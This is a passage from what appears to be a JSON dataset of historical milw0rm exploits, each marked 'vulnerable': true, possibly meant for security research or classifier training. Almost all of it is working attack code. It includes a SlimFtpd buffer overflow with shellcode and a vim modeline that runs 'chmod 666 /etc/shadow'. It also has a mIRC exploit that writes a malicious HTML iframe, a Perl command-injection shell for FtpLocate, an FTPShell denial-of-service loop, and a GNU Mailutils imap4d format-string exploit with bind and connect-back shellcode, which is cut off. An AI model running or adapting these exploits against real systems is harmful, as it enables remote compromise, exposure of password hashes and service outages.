5.1.1.0 SP1 (IA32) Windows XP 5.1.0.0 SP0 (IA32)\n\n\t\t\t0x77f1a322, // Windows XP 5.1.2.0 SP2 (IA32)\n\n            0x74ffbb65, // Windows 2000 5.0.1.0 SP1 (IA32) Windows 2000 5.0.4.0 SP4 (IA32)\n\n\t\t\t0x77f7fe67, // Windows 2003 Server 5.2.1.0 SP1 (IA32)\n\n            0x44434241,\n\n\t\t\t0\n\n        };\n\n\n\nunsigned char shellcode[] = \"\\xEB\"\n\n\"\\x0F\\x58\\x80\\x30\\x88\\x40\\x81\\x38\\x68\\x61\\x63\\x6B\\x75\\xF4\\xEB\\x05\\xE8\\xEC\\xFF\\xFF\"\n\n\"\\xFF\\x60\\xDE\\x88\\x88\\x88\\xDB\\xDD\\xDE\\xDF\\x03\\xE4\\xAC\\x90\\x03\\xCD\\xB4\\x03\\xDC\\x8D\"\n\n\"\\xF0\\x89\\x62\\x03\\xC2\\x90\\x03\\xD2\\xA8\\x89\\x63\\x6B\\xBA\\xC1\\x03\\xBC\\x03\\x89\\x66\\xB9\"\n\n\"\\x77\\x74\\xB9\\x48\\x24\\xB0\\x68\\xFC\\x8F\\x49\\x47\\x85\\x89\\x4F\\x63\\x7A\\xB3\\xF4\\xAC\\x9C\"\n\n\"\\xFD\\x69\\x03\\xD2\\xAC\\x89\\x63\\xEE\\x03\\x84\\xC3\\x03\\xD2\\x94\\x89\\x63\\x03\\x8C\\x03\\x89\"\n\n\"\\x60\\x63\\x8A\\xB9\\x48\\xD7\\xD6\\xD5\\xD3\\x4A\\x80\\x88\\xD6\\xE2\\xB8\\xD1\\xEC\\x03\\x91\\x03\"\n\n\"\\xD3\\x84\\x03\\xD3\\x94\\x03\\x93\\x03\\xD3\\x80\\xDB\\xE0\\x06\\xC6\\x86\\x64\\x77\\x5E\\x01\\x4F\"\n\n\"\\x09\\x64\\x88\\x89\\x88\\x88\\xDF\\xDE\\xDB\\x01\\x6D\\x60\\xAF\\x88\\x88\\x88\\x18\\x89\\x88\\x88\"\n\n\"\\x3E\\x91\\x90\\x6F\\x2C\\x91\\xF8\\x61\\x6D\\xC1\\x0E\\xC1\\x2C\\x92\\xF8\\x4F\\x2C\\x25\\xA6\\x61\"\n\n\"\\x51\\x81\\x7D\\x25\\x43\\x65\\x74\\xB3\\xDF\\xDB\\xBA\\xD7\\xBB\\xBA\\x88\\xD3\\x05\\xC3\\xA8\\xD9\"\n\n\"\\x77\\x5F\\x01\\x57\\x01\\x4B\\x05\\xFD\\x9C\\xE2\\x8F\\xD1\\xD9\\xDB\\x77\\xBC\\x07\\x77\\xDD\\x8C\"\n\n\"\\xD1\\x01\\x8C\\x06\\x6A\\x7A\\xA3\\xAF\\xDC\\x77\\xBF\\x77\\xDD\\xB8\\xB9\\x48\\xD8\\xD8\\xD8\\xD8\"\n\n\"\\xC8\\xD8\\xC8\\xD8\\x77\\xDD\\xA4\\x01\\x4F\\xB9\\x53\\xDB\\xDB\\xE0\\x8A\\x88\\x88\\xED\\x01\\x68\"\n\n\"\\xE2\\x98\\xD8\\xDF\\x77\\xDD\\xAC\\xDB\\xDF\\x77\\xDD\\xA0\\xDB\\xDC\\xDF\\x77\\xDD\\xA8\\x01\\x4F\"\n\n\"\\xE0\\xCB\\xC5\\xCC\\x88\\x01\\x6B\\x0F\\x72\\xB9\\x48\\x05\\xF4\\xAC\\x24\\xE2\\x9D\\xD1\\x7B\\x23\"\n\n\"\\x0F\\x72\\x09\\x64\\xDC\\x88\\x88\\x88\\x4E\\xCC\\xAC\\x98\\xCC\\xEE\\x4F\\xCC\\xAC\\xB4\\x89\\x89\"\n\n\"\\x01\\xF4\\xAC\\xC0\\x01\\xF4\\xAC\\xC4\\x01\\xF4\\xAC\\xD8\\x05\\xCC\\xAC\\x98\\xDC\\xD8\\xD9\\xD9\"\n\n\"\\xD9\\xC9\\xD9\\xC1\\xD9\\xD9\\xDB\\xD9\\x77\\xFD\\x88\\xE0\\xFA\\x76\\x3B\\x9E\\x77\\xDD\\x8C\\x77\"\n\n\"\\x58\\x01\\x6E\\x77\\xFD\\x88\\xE0\\x25\\x51\\x8D\\x46\\x77\\xDD\\x8C\\x01\\x4B\\xE0\\x77\\x77\\x77\"\n\n\"\\x77\\x77\\xBE\\x77\\x5B\\x77\\xFD\\x88\\xE0\\xF6\\x50\\x6A\\xFB\\x77\\xDD\\x8C\\xB9\\x53\\xDB\\x77\"\n\n\"\\x58\\x68\\x61\\x63\\x6B\\x90\";\n\n\n\nlong gimmeip(char *);\n\nvoid keepout();\n\nvoid shell(int);\n\n\n\nvoid keepout() {\n\n#ifdef WIN\n\n   WSACleanup();\n\n#endif\n\n   exit(1);\n\n}\n\n\n\nvoid banner() {\n\n\tprintf(\"- SlimFtpd v3.15 and v3.16 remote buffer overflow\\n\");\n\n\tprintf(\"- Written by redsand (redsand [at] redsand.net)\\n\");\n\n}\n\n\n\nvoid usage(char *prog) {\n\n  int i;\n\n  banner();\n\n  printf(\"- Usage: %s <target ip> <OS> [target port]\\n\", prog);\n\n  printf(\"- Targets:\\n\");\n\n  for (i=0; targets[i] != NULL; i++)\n\n\tprintf(\"\\t- %d\\t%s\\n\", i, targets[i]);\n\n  printf(\"\\n\");\n\n\n\n  exit(1);\n\n}\n\n\n\n/***************************************************************/\n\nlong gimmeip(char *hostname) {\n\n  struct hostent *he;\n\n  long ipaddr;\n\n\n\n  if ((ipaddr = inet_addr(hostname)) < 0) {\n\n\tif ((he = gethostbyname(hostname)) == NULL) {\n\n\t   printf(\"[x] Failed to resolve host: %s! Exiting...\\n\\n\",hostname);\n\n           keepout();\n\n\t}\n\n  memcpy(&ipaddr, he->h_addr, he->h_length);\n\n  }\n\n\n\n  return ipaddr;\n\n}\n\n\n\nint main(int argc, char *argv[]) {\n\n  int sock;\n\n  char expbuff[BUFSIZE]; \n\n  char recvbuff[BUFSIZE];\n\n  void *p;\n\n  unsigned short tport = PORT; // default port for ftp\n\n  struct sockaddr_in target;\n\n  unsigned long retaddr;\n\n  int len,i=0;\n\n  unsigned int tar;\n\n\n\n#ifdef WIN\n\n  WSADATA wsadata;\n\n  WSAStartup(MAKEWORD(2,0), &wsadata);\n\n#endif\n\n\n\n\n\n  if(argc < 3) usage(argv[0]);\n\n\n\n  if(argc == 4)\n\n    tport = atoi(argv[3]);\n\n\n\n  banner();\n\n  tar = atoi(argv[2]);\n\n  retaddr = offsets[tar];\n\n\n\n\n\n  printf(\"- Using return address of 0x%8x : %s\\n\",retaddr,targets[tar]);\n\n  printf(\"\\n[+] Initialize socket.\");\n\n  if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {\n\n\tperror(\"[x] Error socket. Exiting...\\n\");\n\n\tkeepout();\n\n  }\n\n\n\n  memset(&target,0x00,sizeof(target));\n\n  target.sin_family = AF_INET;\n\n  target.sin_addr.s_addr = gimmeip(argv[1]);\n\n  target.sin_port = htons(tport);\n\n\n\n\n\n  printf(\"\\n[+] Prepare exploit buffer... \");\n\n  memset(expbuff, 0x00, BUFSIZE);\n\n  memset(recvbuff, 0x00, BUFSIZE);\n\n  \n\n\n\n  memcpy(expbuff, login[2], strlen(login[2]));\n\n  p =  &expbuff[strlen(login[2]) ];\n\n \n\n  memset(p, NOP, LSZ);\n\n  memcpy(&expbuff[10],shellcode,sizeof(shellcode)-1);\n\n\n\n  *(unsigned long *)&expbuff[507] = retaddr;\n\n  p =  &expbuff[511];\n\n  memcpy(p, \"\\n\",1);\n\n  \n\n  printf(\"\\n[+] Connecting at %s:%hu...\", argv[1], tport);\n\n  fflush(stdout);\n\n  if (connect(sock,(struct sockaddr*)&target,sizeof(target))!=0) {\n\n  \tfprintf(stderr,\"\\n[x] Couldn't establish connection. Exiting...\\n\");\n\n  \tkeepout();\n\n  }\n\n  printf(\" - OK.\\n\");\n\n  len = recv(sock, recvbuff, BUFSIZE-1, 0);\n\n  if(len < 0) {\n\n\tfprintf(stderr,\"\\nError response server\\n\");\n\n  \texit(1);\n\n  }\n\n  \n\n  printf(\"    - Size of payload is %d bytes\",strlen(expbuff));\n\n\n\n\n\n  printf(\"\\n[+] Initiating exploit... \");\n\n  printf(\"\\n    - Sending USER...\");\n\n  if(send(sock,login[0],strlen(login[0]),0)==-1) {\n\n\tfprintf(stderr,\"\\n[-] Exploit failed.\\n\");\n\n\tkeepout();\n\n  }\n\n\n\n  len = recv(sock, recvbuff, BUFSIZE-1,0);\n\n  if(len < 0) {\n\n\tfprintf(stderr,\"\\nError recv.\");\n\n\texit(1);\n\n  }\n\n  recvbuff[len] = 0;\n\n\n\n  printf(\"\\n    - Sending PASS...\");\n\n  \n\n  if(send(sock,login[1],strlen(login[1]),0)==-1) {\n\n    printf(\"\\n[-] Exploit failed.\\n\");\n\n\tkeepout();\n\n  }\n\n\n\n  len = recv(sock, recvbuff, BUFSIZE, 0);\n\n  if(len < 0) {\n\n\tfprintf(stderr,\"\\nError recv.\");\n\n\texit(1);\n\n  }\n\n  recvbuff[len] = 0;\n\n\n\n  printf(\"\\n    - Creating X-DIR...\");\n\n  \n\n  if(send(sock,login[3],strlen(login[3]),0)==-1) {\n\n    printf(\"\\n[-] Exploit failed.\\n\");\n\n\tkeepout();\n\n  }\n\n\n\n  len = recv(sock, recvbuff, BUFSIZE, 0);\n\n  if(len < 0) {\n\n\tfprintf(stderr,\"\\nError recv.\");\n\n\texit(1);\n\n  }\n\n  recvbuff[len] = 0;\n\n\n\n  if(send(sock,login[4],strlen(login[4]),0)==-1) {\n\n    printf(\"\\n[-] Exploit failed.\\n\");\n\n\tkeepout();\n\n  }\n\n\n\n  len = recv(sock, recvbuff, BUFSIZE, 0);\n\n  if(len < 0) {\n\n\tfprintf(stderr,\"\\nError recv.\");\n\n\texit(1);\n\n  }\n\n  recvbuff[len] = 0;\n\n\n\n  printf(\"\\n    - Sending Exploit String...\");\n\n  if(send(sock,expbuff,strlen(expbuff),0)==-1) {\n\n\tprintf(\"\\n[-] Exploit failed.\\n\");\n\n\tkeepout();\n\n  }\n\n\n\n  printf(\"- OK.\");\n\n  \n\n  printf(\"\\n[+] Now try to connect to the shell on %s:101\\n\", argv[1] );\n\n\n\n\n\n\n\n#ifdef WIN\n\n  closesocket(sock);\n\n  WSACleanup();\n\n#else\n\n  close(sock);\n\n#endif\n\n\n\n  return(0);\n\n}\n\n\n\n// milw0rm.com [2005-07-25]",
640        "vulnerable": true
641    },
642    {
643        "exploit_id": 1119,
644        "content": "1) open up a text file.\n\n\n\n2) insert at the top the information (below).\n\n\n\n/* vim: foldmethod=expr:foldexpr=glob(\"`chmod\\ 666\\ /etc/shadow`\") */\n\n\n\n3) if modlines = on anyone that opens the file with vim will execute the command:\n\n   chmod 666 /etc/shadow\n\n   \n\nHave fun making your own commands.\n\n\n\nThe advisory can be found at:\n\n  http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html\n\n\n\n/str0ke\n\n\n\n# milw0rm.com [2005-07-25]",
645        "vulnerable": true
646    },
647    {
648        "exploit_id": 112,
649        "content": "/** remote mirc < 6.11 exploit by blasty\n\n **\n\n ** TESTED ON: Windows XP (No SP, Ducth) Build: 2600.xpclient.010817-1148\n\n **\n\n ** A few days ago, I saw a mIRC advisory on packetstorm [1] and was surprised\n\n ** nobody had written an exploit yet. So I decided to start writing one.\n\n ** Since this was my first time coding a exploit for windows, it took some\n\n ** research before I got the hang of it. (Ollydbg is much more confusing then GDB btw :P)\n\n **\n\n ** This exploits (ab)uses the bug in irc:// URI handling. It contains a buffer-\n\n ** overflow, and when more then 998 bytes are given EIP will be overwritten.\n\n ** \n\n ** At first I was thinking of a simple solution to get this exploitable. Since\n\n ** giving an URI with > 998 chars to someone on IRC is simply NOT done :)\n\n ** Then I remember the iframe-irc:// flaw found by uuuppzz [2]\n\n **\n\n ** This exploit will write an malicious HTML file containing an iframe executing the\n\n ** irc:// address. So you can give this to anyone on IRC for example ;)\n\n ** The shellcode included does only execute cmd.exe, because I don't want to be this\n\n ** a scriptkiddy util. But, replacing the shellcode with your own is also possible.\n\n ** An 400 bytes shellcode (bindshell etc.) easily fits in the buffer, but it may require\n\n ** some tweaking.\n\n ** After exiting the cmd.exe mIRC will crash, so shellcode its not 100% clean, but who carez :)\n\n **\n\n ** Oh yeah, I almost forgot.. this exploit also works even if mIRC isn't started.\n\n ** mIRC will start automatically when an irc:// is executed, so you can also send somebody\n\n ** and HTML email containing the evil HTML code. (only for poor clients like Outlook Express :P)\n\n **\n\n **/\n\n\n\n#include <stdio.h>\n\n\n\n\n\n/* Stupid cmd.exe exec shellcode. hey! I r !evil ;) */\n\nunsigned char shellcode[] =\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\x8b\\xec\\x55\\x8b\\xec\\x68\\x65\\x78\\x65\\x20\\x68\\x63\\x6d\\x64\\x2e\\x8d\\x45\\xf8\\x50\\xb8\"\n\n\t\"\\x44\\x80\\xbf\\x77\"\t\t\t//\t0x78bf8044 <- adress of system()\n\n\t\"\\xff\\xd0\";\t\t\t\t//  \tcall    system()\n\n\t\n\n\n\nchar jmpback[] =\n\n        \"\\xE9\\xCF\\xFB\\xFF\\xFF\"; // my leet negative JMP shellcode :)\n\n\n\nchar buffer[1100], fstring[1300]; // heh, need to clean this up\n\n\n\nint main(int argc, char *argv[]) {\n\n\tFILE *evil;\n\n\n\n\tfprintf(stdout, \"---------------------------------------------\\n\"\n\n\t\t\t\"mIRC < 6.11 remote exploit by blasty@geekz.nl\\n\"\n\n                                                \"Exploit downloaded on www.k-otik.com\\n\"\n\n\t\t\t\"---------------------------------------------\\n\\n\");\n\n\n\n\t// NOPslides are cool\n\n\tmemset(buffer, 0x90, sizeof(buffer) - 1);\n\n\n\n\t// place shellcode in buffer\n\n\tmemcpy(buffer + 20, shellcode, strlen(shellcode));\n\n\n\n\t// took this one from ntdll.dll (jmp esp)\n\n\t*(long *)&buffer[994] = 0x77F4801C;\n\n\n\n\t// place jmpback shellcode in buffer\n\n\tmemcpy(buffer + 20 + strlen(shellcode) + 1010, jmpback, strlen(jmpback));\n\n\n\n\tprintf(\"[+] Evil buffer constructed\\n\");\n\n\n\n\n\n\t// open HTML file for writing\n\n\tif((evil = fopen(\"index.html\", \"a+\")) != NULL) {\n\n\n\n\t\t// construct evil string :)\n\n\t\tsprintf(fstring, \"<iframe src=\\\"irc://%s\\\"></iframe>\", buffer);\n\n\n\n\t\t// write string to file\n\n\t\tfputs(fstring, evil);\n\n\n\n\t\t// close file\n\n\t\tfclose(evil);\n\n\n\n\t\tprintf(\"[+] Evil HTML file written!\\n\");\n\n\t\treturn(0);\n\n\t} else {\n\n\t\t// uh oh.. :/\n\n\t\tfprintf(stderr, \"ERROR: Could not open index.html for writing!\\n\");\n\n\t\texit(1);\n\n\t}\n\n}\n\n\n\n\n\n// milw0rm.com [2003-10-21]",
650        "vulnerable": true
651    },
652    {
653        "exploit_id": 1120,
654        "content": "## Alot of code for a cgi | vuln. \n\n# /str0ke\n\n\n\n#!/usr/bin/perl\n\n#\n\n# FtpLocate <= 2.02 (current) remote exploit\n\n# VERY PRIVATE VERSION\n\n# DO NOT DISTRIBUTE\n\n#\n\n# newbug Tseng [at] chroot.org\n\n#\n\n\n\nsub my_socket\n\n{\n\n       my $s=IO::Socket::INET->new(PeerAddr => $host,\n\n                               PeerPort => 80,\n\n                               Proto => \"tcp\") or die \"socket: \";\n\n}\n\nsub ch2hex\n\n{\n\n       $chr = $_[0];\n\n       $out=\"\";\n\n       for($i=0;$i<length($chr);$i++)\n\n       {\n\n               $ch = substr($chr,$i,1);\n\n\n\n               if($ch eq \"\\\"\")\n\n               {\n\n                       $out.=\"%5c%22\";\n\n               }\n\n\n\n               elsif($ch eq \"\\$\")\n\n               {\n\n                       $out.=\"%5c%24\";\n\n               }\n\n               elsif($ch eq \"\\@\")\n\n               {\n\n                       $out.=\"%5c%40\";\n\n               }\n\n               else\n\n               {\n\n                       $out.=\"%\".sprintf(\"%2.2x\",ord($ch));\n\n               }\n\n       }\n\n       $out;\n\n}\n\nsub upload_file\n\n{\n\n       print \"local file: \";\n\n       chomp($lfile = <STDIN>);\n\n       print \"remote file: \";\n\n       chomp($rfile = <STDIN>);\n\n\n\n       my $socket = &my_socket($host);\n\n       print $socket \"GET $cgi?query=xx\\&fsite=|rm%20-f%20$rfile| $junk\";\n\n       close $socket;\n\n       print \"remove $host:$rfile done.\\n\";\n\n\n\n       my @DATA = `cat $lfile`;\n\n       $num=1;\n\n       $total = scalar @DATA;\n\n       foreach $DATA (@DATA)\n\n       {\n\n               $DATA = &ch2hex($DATA);\n\n               my $socket = &my_socket($host);\n\n               print $socket \"GET $cgi?query=xx\\&fsite=|echo%20\\\"$DATA\\\"%20>>$rfile| $junk\";\n\n               print \"Send lfile \\\"$lfile\\\" to $host:$rfile ... ($num/$total)\\n\";\n\n               sleep(1);\n\n               close $socket;\n\n               $num++;\n\n       }\n\n}\n\nuse IO::Socket::INET;\n\n\n\nprint \"FtpLocate flsearch.pl remote exploit\\n\";\n\nprint \"host: \";\n\nchomp ($host = <STDIN>);\n\nprint \"port (80): \";\n\nchomp ($port = <STDIN>);\n\nif($port eq \"\")\n\n{\n\n       $port = 80;\n\n}\n\nprint \"version 1.0/1.1 (1.0): \";\n\nchomp ($ver = <STDIN>);\n\nif($ver eq \"\")\n\n{\n\n       $ver = \"1.0\";\n\n}\n\nprint \"cmd/upload (cmd): \";                                                     chomp ($opt = <STDIN>);\n\nif($opt eq \"\")                                                                  {\n\n       $opt = \"cmd\";\n\n}\n\nprint \"cgi path (/cgi-bin/ftplocate/flsearch.pl): \";\n\nchomp ($cgi = <STDIN>);\n\nif($cgi eq \"\")\n\n{\n\n       $cgi = \"/cgi-bin/ftplocate/flsearch.pl\";\n\n}\n\nif($ver eq \"1.0\")\n\n{\n\n       $junk = \"HTTP/1.0\\n\\n\";\n\n}\n\nelse\n\n{\n\n       $junk = \"HTTP/1.1\\nHost: $host\\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030624 Netscape/7.1\\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\\nAccept-Language: zh-tw,en-us;q=0.7,en;q=0.3\\nAccept-Encoding: gzip,deflate\\nAccept-Charset: Big5,utf-8;q=0.7,*;q=0.7\\nKeep-Alive: 300\\nConnection: keep-alive\\n\\n\";                                        }\n\nif($opt eq \"cmd\")\n\n{\n\n       while(1){\n\n               print \"h4ck3r\\@[$host]:~\\$ \";\n\n               chomp ($cmd = <STDIN>);\n\n               if($cmd ne \"\")\n\n               {\n\n                       print \"Send command \\\"$cmd\\\" to $host ...\\n\";\n\n                       $socket = &my_socket($host);\n\n                       $cmd =~ s/\\s/%20/g;\n\n\n\n                       print $socket \"GET $cgi?query=xx\\&fsite=|$cmd| $junk\";\n\n                       print \"done.\\n\";\n\n               }\n\n       }\n\n}\n\nelsif($opt eq \"upload\")\n\n{\n\n       &upload_file($lfile);\n\n}\n\n\tprint \"done.\\n\";\n\n\n\n# milw0rm.com [2005-07-25]",
655        "vulnerable": true
656    },
657    {
658        "exploit_id": 1121,
659        "content": "#!/usr/bin/perl\n\n#\n\n# Usage: FTPShell_FTPDOS.pl <ip> <user> <pass>\n\n#        FTPShell_FTPDOS.pl 127.0.0.1 hello moto\n\n#\n\n# FTPshell Server Version 3.38\n\n#\n\n# Download:\n\n# http://www.ftpshell.com/\n\n#\n\n################################################\n\n\n\nuse IO::Socket;\n\nuse Win32;\n\nuse strict;\n\n\n\nmy($i)      = \"\";\n\nmy($socket) = \"\";\n\n\n\nfor ($i = 1; $i <= 40; $i++)\n\n{\n\n        if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],\n\n                                            PeerPort => \"21\",\n\n                                            Proto    => \"TCP\"))\n\n        {\n\n                print \"Login \\#$i\\n\";\n\n\n\n                Win32::Sleep(300);\n\n\n\n                print $socket \"USER $ARGV[1]\\r\\n\";\n\n\n\n                Win32::Sleep(100);\n\n\n\n                print $socket \"PASS $ARGV[2]\\r\\n\";\n\n\n\n                Win32::Sleep(100);\n\n\n\n                print $socket \"PORT 127,0,0,1,18,12\\r\\n\";\n\n\n\n                Win32::Sleep(100);\n\n\n\n                close($socket);\n\n        }\n\n        else\n\n        {\n\n                print \"Cannot connect to $ARGV[0]:21\\n\";\n\n        }\n\n}\n\n\n\n# milw0rm.com [2005-07-26]",
660        "vulnerable": true
661    },
662    {
663        "exploit_id": 1123,
664        "content": "/* mu-imap4d_fsexp.c\n\n *\n\n * GNU Mailutils imap4d v0.6 remote format string exploit\n\n * by CoKi <coki@nosystem.com.ar>\n\n *\n\n * Original Reference:\n\n * http://www.idefense.com/application/poi/display?id=246&type=vulnerabilities\n\n *\n\n * coki@nosystem:/home/coki/audit$ ./mu-imap4d_fsexp\n\n *\n\n *  GNU Mailutils imap4d v0.6 remote format string exploit\n\n *  by CoKi <coki@nosystem.com.ar>\n\n *\n\n *  use: ./mu-imap4d_fsexp -h <target_host> [-p <target_port>]\n\n *       ./mu-imap4d_fsexp -h <target_host> -c <your_host> [-b <your_port>]\n\n *\n\n *                 -p      target imapd port (143 by default)\n\n *                 -c      your host/ip\n\n *                 -b      your port (45295 by default)\n\n *\n\n * coki@nosystem:/home/coki/audit$ ./mu-imap4d_fsexp -h 10.0.0.1\n\n *\n\n *  GNU Mailutils imap4d v0.6 remote format string exploit\n\n *  by CoKi <coki@nosystem.com.ar>\n\n *\n\n *  [*] verifying host             : 10.0.0.1\n\n *  [*] imapd port                 : 143\n\n *  [*] connecting...              : done!\n\n *\n\n *  [*] getting target info...\n\n *  [*] buffer address             : 0x08059810\n\n *  [*] shellcode address          : 0x080599a0\n\n *  [*] basic return address       : 0xbffffa28\n\n *\n\n *  [*] searching ret address...   : 0xbffff988\n\n *\n\n *  [!] you have a shell :)\n\n *\n\n * Linux firewall 2.4.31 #1 SMP Wed Jun 22 23:13:19 ART 2005 i586 unknown\n\n * uid=0(root) gid=12(mail) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)\n\n *\n\n * Tested in Slackware Linux 9.0 / 10.0 / 10.1\n\n *\n\n * by CoKi <coki@nosystem.com.ar>\n\n * No System Group - http://www.nosystem.com.ar\n\n */\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <unistd.h>\n\n#include <errno.h>\n\n#include <string.h>\n\n#include <getopt.h>\n\n#include <netdb.h>\n\n#include <sys/types.h>\n\n#include <sys/fcntl.h>\n\n#include <netinet/in.h>\n\n#include <sys/socket.h>\n\n\n\n#define BUFFERSIZE      2048\n\n#define ERROR           -1\n\n#define TIMEOUT         3\n\n#define PORTBIND\t5074\n\n#define CONNBACK\t45295\n\n#define IMAPD           143\n\n\n\nvoid use(char *program);\n\nint check(unsigned long addr);\n\nint connect_timeout(int sfd, struct sockaddr *serv_addr,\n\n\tsocklen_t addrlen, int timeout);\n\nvoid exploit(char *host, unsigned int imapdport);\n\nvoid shell(char *host, unsigned port);\n\nvoid getinfo(char *host, unsigned int imapdport);\n\nint chkshaddr(char *host, unsigned int imapdport, int i);\n\n\n\n/*\n\n * s0t4ipv6@Shellcode.com.ar\n\n * x86 portbind a shell in port 5074\n\n * 92 bytes.\n\n */\n\n\n\nchar port_bind[] =\n\n\t\"\\x31\\xc0\\x50\\x40\\x89\\xc3\\x50\\x40\"\n\n\t\"\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x31\"\n\n\t\"\\xd2\\x52\\x66\\x68\\x13\\xd2\\x43\\x66\"\n\n\t\"\\x53\\x89\\xe1\\x6a\\x10\\x51\\x50\\x89\"\n\n\t\"\\xe1\\xb0\\x66\\xcd\\x80\\x40\\x89\\x44\"\n\n\t\"\\x24\\x04\\x43\\x43\\xb0\\x66\\xcd\\x80\"\n\n\t\"\\x83\\xc4\\x0c\\x52\\x52\\x43\\xb0\\x66\"\n\n\t\"\\xcd\\x80\\x93\\x89\\xd1\\xb0\\x3f\\xcd\"\n\n\t\"\\x80\\x41\\x80\\xf9\\x03\\x75\\xf6\\x52\"\n\n\t\"\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\"\n\n\t\"\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\"\n\n\t\"\\xb0\\x0b\\xcd\\x80\";\n\n\n\n/*\n\n * BSD x86 shellcode by eSDee of Netric (www.netric.org)\n\n * 124 byte - connect back shellcode (port=0xb0ef)\n\n */\n\n\n\nchar conn_back[] =\n\n\t\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\"\n\n\t\"\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\"\n\n\t\"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\"\n\n\t\"\\x89\\xc2\\x31\\xc0\\x31\\xc9\\x51\\x51\"\n\n\t\"\\x68\\xff\\xff\\xff\\xff\\x66\\x68\\xff\"\n\n\t\"\\xff\\xb1\\x02\\x66\\x51\\x89\\xe7\\xb3\"\n\n\t\"\\x10\\x53\\x57\\x52\\x89\\xe1\\xb3\\x03\"\n\n\t\"\\xb0\\x66\\xcd\\x80\\x31\\xc9\\x39\\xc1\"\n\n\t\"\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\"\n\n\t\"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xcd\\x80\"\n\n\t\"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xb1\\x01\"\n\n\t\"\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\"\n\n\t\"\\xb1\\x02\\xcd\\x80\\x31\\xc0\\x31\\xd2\"\n\n\t\"\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\"\n\n\t\"\\x2f\\x62\\x69\\x89\\xe3\\x50\\x53\\x89\"\n\n\t\"\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\xb0\"\n\n\t\"\\x01\\xcd\\x80\";\n\n\n\nint bretaddr=0, shaddr=0;\n\nunsigned int pos=0, cback=0, shsize;\n\nunsigned short rport=CONNBACK;\n\nin_addr_t rhost=0;\n\n\n\nint main(int argc, char *argv[]) { \n\n\tchar opt, *host=NULL, *rh=NULL;\n\n\tint sockfd;\n\n\tunsigned int imapdport=IMAPD;\n\n\tstruct hostent *he;\n\n\tstruct sockaddr_in dest_dir;\n\n\n\n\tprintf(\"\\n GNU Mailutils imap4d v0.6 remote format string exploit\\n\");\n\n\tprintf(\" by CoKi <coki@nosystem.com.ar>\\n\\n\");\n\n\n\n\twhile((opt = getopt(argc,argv,\"h:p:c:b:\")) != EOF) {\n\n\t\tswitch (opt) {\n\n\t\t\tcase 'h':\n\n\t\t\t\thost = optarg;\n\n\t\t\t\tbreak;\n\n\t\t\tcase 'p':\n\n\t\t\t\timapdport = atoi(optarg);\n\n\t\t\t\tbreak;\n\n\t\t\tcase 'c':\n\n\t\t\t\trhost = inet_addr(optarg);\n\n\t\t\t\trh = optarg;\n\n\t\t\t\tcback++;\n\n\t\t\t\tbreak;\n\n\t\t\tcase 'b':\n\n\t\t\t\trport = atoi(optarg);\n\n\t\t\t\tbreak;\n\n\t\t\tdefault:\n\n\t\t\t\tuse(argv[0]);\n\n\t\t\t\tbreak;\n\n\t\t}\n\n\t}\n\n\n\n\tif(host == NULL) use(argv[0]);\n\n\n\n\tif(cback) {\n\n\t\tprintf(\" [*] verifying your host\\t:\");\n\n\t\tfflush(stdout);\n\n\n\n\t\tif((he=gethostbyname(rh)) == NULL) {\n\n\t\t\therror(\" gethostbyname()\");\n\n\t\t\tprintf(\"\\n\");\n\n\t\t\texit(1);\n\n\t\t}\n\n\n\n\t\tshsize = strlen(conn_back);\n\n\n\n\t\tconn_back[33]=(rhost & 0x000000ff);\n\n\t\tconn_back[34]=(rhost & 0x0000ff00) >> 8;\n\n\t\tconn_back[35]=(rhost & 0x00ff0000) >> 16;\n\n\t\tconn_back[36]=(rhost & 0xff000000) >> 24;\n\n\n\n\t\tconn_back[39]=(rport & 0xff00) >> 8;\n\n\t\tconn_back[40]=(rport & 0x00ff);\n\n\n\n\t\tprintf(\" %s\\n\", inet_ntoa(*((struct in_addr *)he->h_addr)));\n\n\t\tprintf(\" [*] connect back port\\t\\t: %u\\n\", rport);\n\n\t}\n\n\n\n\tif(strlen(conn_back) < shsize) {\n\n\t\tprintf(\"\\n [!] failed! your host or port contain null-bytes\\n\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tprintf(\" [*] verifying target host\\t:\");\n\n\n\n\tif((he=gethostbyname(host)) == NULL) {\n\n\t\therror(\" gethostbyname()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n        }\n\n\n\n\tprintf(\" %s\\n\", inet_ntoa(*((struct in_addr *)he->h_addr)));\n\n\tprintf(\" [*] target imapd port\\t\\t: %u\\n\\n\", imapdport);\n\n\n\n\tprintf(\" [*] connecting...\\t\\t:\");\n\n\tfflush(stdout);\n\n\n\n\tif((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {\n\n\t\tperror(\" socket()\");\n\n\t\tprintf(\"\\n\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\tdest_dir.sin_family = AF_INET;\n\n\tdest_dir.sin_port = htons(imapdport);\n\n\tdest_dir.sin_addr = *((struct in_addr *)he->h_addr);\n\n\tbzero(&(dest_dir.sin_zero), 8);\n\n\n\n\tif(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,\n\n\t\tsizeof(struct sockaddr), 